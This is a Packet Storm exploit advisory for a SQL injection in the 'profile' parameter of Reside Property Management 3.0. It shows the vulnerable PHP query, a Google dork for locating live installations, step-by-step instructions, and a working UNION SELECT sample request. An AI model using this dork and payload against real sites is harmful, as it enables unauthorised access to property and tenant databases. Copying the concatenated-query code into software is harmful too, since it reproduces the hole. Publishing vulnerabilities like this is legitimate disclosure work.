Reside Property Management 3.0 SQL Injection

2020-06-30T00:00:00
ID PACKETSTORM:158245
Type packetstorm
Reporter AmirMohammad Safari
Modified 2020-06-30T00:00:00

Description

                                        
                                            `# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection  
# Date: 2020-06-28  
# Google Dork: "Copyright 2020 Reside Property Management"  
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)  
# Team Members: Behzad Khalifeh , Milad Ranjbar  
# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/  
# Version: v3.0 [Final Version]  
# Tested on: Windows/Linux  
# CVE: N/A  
  
.:: Description ::.  
RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device.  
  
  
.:: Vulnerable File ::.  
profile.php  
  
  
.:: Vulnerable Code ::.  
- Line 21: $profile = $_GET['profile'];  
- Line 22: $adminsName = preg_replace('/-/', ' ', $profile);  
- Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'";  
- Line 91: mysqli_query $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error());  
  
  
.:: Proof Of Concept (PoC) ::.  
Step 1 - Find Your Target With the above Dork.  
Step 2 - Find profile.php File in Target  
Step 3 - Inject Your Payloads in profile parameter  
  
  
.:: Sample Request ::.  
localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23  
  
`